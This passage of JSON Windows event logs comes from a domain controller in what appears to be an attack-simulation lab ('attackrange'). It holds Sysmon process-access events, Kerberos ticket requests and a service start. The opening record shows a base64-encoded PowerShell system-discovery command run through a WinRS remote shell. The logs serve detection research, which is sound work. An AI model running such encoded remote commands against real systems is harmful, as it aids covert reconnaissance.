KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F88-5F25-0000-0020B3460400}","LogonId":"0x446b3","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","ParentProcessId":"4108","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nSourceProcessId: 4108\r\nSourceThreadId: 4164\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001014640400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","SourceProcessId":"4108","SourceThreadId":"4164","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001014640400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1668\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1668","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2104\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x147A\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\themeservice.dll+3de3|c:\\windows\\system32\\themeservice.dll+26c0|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"2104","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x147a","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\themeservice.dll+3de3|c:\\windows\\system32\\themeservice.dll+26c0|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001014640400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001014640400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1668\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1668","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76835,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The DNS service entered the running state.","param1":"DNS","param2":"running","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220297,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tSupplied Realm Name:\tATTACKRANGE.LOCAL\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220298,"ProcessID":864,"ThreadID":2400,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tSupplied Realm Name:\tATTACKRANGE.LOCAL\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220299,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{00831AAD-7772-5B99-90B2-A3A58B721FE0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{00831AAD-7772-5B99-90B2-A3A58B721FE0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
